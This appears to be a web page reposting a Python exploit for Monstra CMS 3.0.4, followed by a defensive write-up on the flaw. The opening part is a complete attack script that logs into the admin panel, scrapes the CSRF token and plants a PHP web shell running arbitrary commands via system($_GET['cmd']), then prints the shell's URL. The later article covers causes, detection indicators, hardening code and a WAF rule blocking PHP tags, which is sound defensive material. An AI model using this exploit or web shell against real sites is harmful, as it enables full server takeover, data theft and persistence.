Monstra CMS 3.0.4 - Remote Code Execution (RCE)

Exploit Author: Ahmet Ümit BAYRAM Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-06-03

# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
# Date: 05.05.2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested on: MacOS

import requests
import random
import string
import time
import re
import sys

if len(sys.argv) < 4:
print("Usage: python3 script.py <url> <username> <password>")
sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

session = requests.Session()

login_url = f'{base_url}/admin/index.php?id=dashboard'
login_data = {
'login': username,
'password': password,
'login_submit': 'Log+In'
}

filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
5))

print("Logging in...")
response = session.post(login_url, data=login_data)

if 'Dashboard' in response.text:
print("Login successful")
else:
print("Login failed")
exit()

time.sleep(3)

edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
erişim

token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
(.*?)"', response.text)
if token_search:
token = token_search.group(1)
else:
print("CSRF token could not be found.")
exit()

content = '''
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
'''

edit_data = {
'csrf': token,
'name': filename,
'content': content,
'add_file': 'Save'
}

print("Preparing shell...")
response = session.post(edit_url, data=edit_data)
time.sleep(3)

if response.status_code == 200:
print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
.chunk.php")
else:
print("Failed to prepare shell.")

Monstra CMS 3.0.4 — Remote Code Execution (RCE): Analysis, Impact, and Remediation

This article explains the class of remote code execution (RCE) vulnerability observed in Monstra CMS version 3.0.4, focusing on the root causes, likely impact, how to detect exploitation attempts, and practical mitigations and secure-coding practices. The goal is defensive: to help administrators and developers harden Monstra installations and detect, block, or remediate abuse.

Summary and vulnerability class

Monstra CMS 3.0.4 is known to contain a vulnerability that allows an authenticated attacker with access to theme/template management functionality to create PHP files inside a web-accessible theme directory. When user-supplied content that includes server-side code is saved to a file and the webserver executes that file, the attacker gains remote code execution. Contributing factors typically include:

Insufficient validation or sanitization of template/chunk content before writing to disk.
Failure to restrict created filenames or to enforce extension policies.
Improper CSRF and authorization checks around administrative functionality.
Insecure file permissions that allow webserver processes to write executable files to public directories.

Why this is critical

An RCE in a public-facing CMS enables complete takeover of the webserver or pivoting to internal systems. Impact includes data theft, defacement, persistence (web shells), lateral movement, and pivoting to cloud credentials or internal networks. Even limited administrative accounts on the CMS can be escalated to full system compromise if file-write and execution chains exist.

Indicators of compromise (IoCs) and detection guidance

Detecting exploitation early reduces impact. Look for these signs:

Unexpected PHP files appearing in theme, uploads, or plugin directories. Monitor for recent file creation/modification timestamps under public web folders.
POST requests to administrative endpoints that create or save templates/chunks, especially from unusual IP addresses or at odd hours.
Requests containing PHP opening tags (for example, "<?php") inside parameters that normally hold HTML/template text.
Unusual outbound network connections or new processes spawned by the webserver user.

Suggested log checks and searches (examples):

Search webserver logs for POST requests to admin/template endpoints with large request bodies.
Search file system audit logs for creation of files with .php extension in theme directories.
Alert on content parameters containing substrings like "<php" or "<script" combined with admin endpoints (tune for false positives).

Immediate mitigation steps

If possible, upgrade Monstra to a fixed/patched version provided by the vendor. This is the primary remediation.
Restrict administrative access: limit admin pages to trusted IP ranges, enable VPN or IP allowlists for the admin panel.
Block or harden the theme/template creation endpoints with a WAF or ModSecurity rules that inspect POST bodies for server-side code markers and deny such requests.
Audit and correct filesystem permissions: ensure the webserver user cannot write executable files into public theme directories unless strictly necessary.
Rotate credentials for CMS administrators and any service accounts that might have been exposed.
Search the filesystem for unexpected files and examine recently modified theme and public directories for malicious code. Quarantine and investigate any suspicious files.

Recommended long-term mitigations

Apply vendor patches as soon as they are available and verify installations against vendor advisories.
Implement least privilege for file writes: allow file creation only in specific non-executable upload directories. Serve user content as static assets with no PHP interpretation where possible.
Harden the admin UI with strong CSRF protection, server-side authorization checks, and per-action logging and rate limiting.
Use a web application firewall (WAF) with tuned rules to block attempts to inject executable server-side code through admin forms.
Enable file integrity monitoring (FIM) to detect changes to sensitive web directories and trigger alerts on new or modified executable files.

Secure-coding recommendations for theme/template editors

Below are defensive code patterns that developers can apply to avoid accidental creation of executable files from user-supplied template content. These examples show validation and sanitization; they are intended for remediation only and are safe to publish.

// Example: Basic server-side sanitization and validation (PHP pseudo-code)
$csrf_token = $_POST['csrf'] ?? '';
if (!verify_csrf($csrf_token)) {
    http_response_code(403);
    exit('CSRF verification failed');
}

// Ensure only authorized users perform this action
if (!current_user_can('manage_themes')) {
    http_response_code(403);
    exit('Not authorized');
}

$filename = basename($_POST['name'] ?? '');
$content = $_POST['content'] ?? '';

// Reject names with suspicious characters and force a safe extension
if (!preg_match('/^[a-z0-9_\-]{1,64}$/i', $filename)) {
    exit('Invalid filename');
}

// Prevent any PHP open tag in submitted content
if (preg_match('/<\?php/i', $content)) {
    exit('PHP code not allowed in template content');
}

// Optionally whitelist allowed HTML and template constructs instead of allowing raw input
$allowed = '
'; // example whitelist
$content = strip_tags($content, $allowed);

// Write file in a non-executable directory or with a safe extension
$safe_path = '/var/www/monstra_data/templates/' . $filename . '.chunk.html';
file_put_contents($safe_path, $content);


Explanation: This snippet enforces CSRF verification, authorization checks, filename validation, explicit rejection of PHP opening tags, optional HTML whitelisting, and writing files to a non-executable path with a safe extension. It reduces the risk that user-provided content can become executable server-side code.

Example defensive WAF rule (conceptual)
Use a WAF rule to block attempts to submit PHP tags through administrative POSTs. Below is a conceptual ModSecurity-style rule (illustrative only — adapt and test for your environment).


# Block POSTs containing PHP opening tags in the "content" parameter
SecRule REQUEST_METHOD "POST" \
    "chain,phase:2,deny,status:403,msg:'Blocked PHP tag in content parameter'"
    SecRule ARGS:content "@rx <\?php" "t:none"
Explanation: This rule inspects POST requests and denies those where the content parameter contains "<?php". It should be deployed carefully and tested to avoid disrupting legitimate administrative activity. Combine such rules with logging and alerting.
Post-compromise response checklist
 Isolate the host from the network to prevent lateral movement.
 Collect forensic artifacts: webserver logs, process lists, crontabs, and recent file changes.
 Scan for web shells and backdoors; check scheduled tasks, authorized_keys, and database integrity.
 Rebuild compromised hosts from known-good images if possible; otherwise perform in-depth remediation guided by forensics.
 Rotate credentials and secrets that may have been exposed from the environment (API keys, database passwords, cloud credentials).
 Notify stakeholders and comply with breach reporting requirements if sensitive data was exposed.
Conclusion and expert advice
RCE via template or theme editors is a high-risk category because it directly converts user-supplied data into executable server-side code. For Monstra CMS administrators and developers, the most effective protections are timely patching, reducing the attack surface (restricting admin access), enforcing strict server-side validation, and preventing webserver processes from writing executables into public directories. Combine these with monitoring, WAF protections, and incident response readiness to minimize chances of successful exploitation and to respond quickly if a compromise occurs.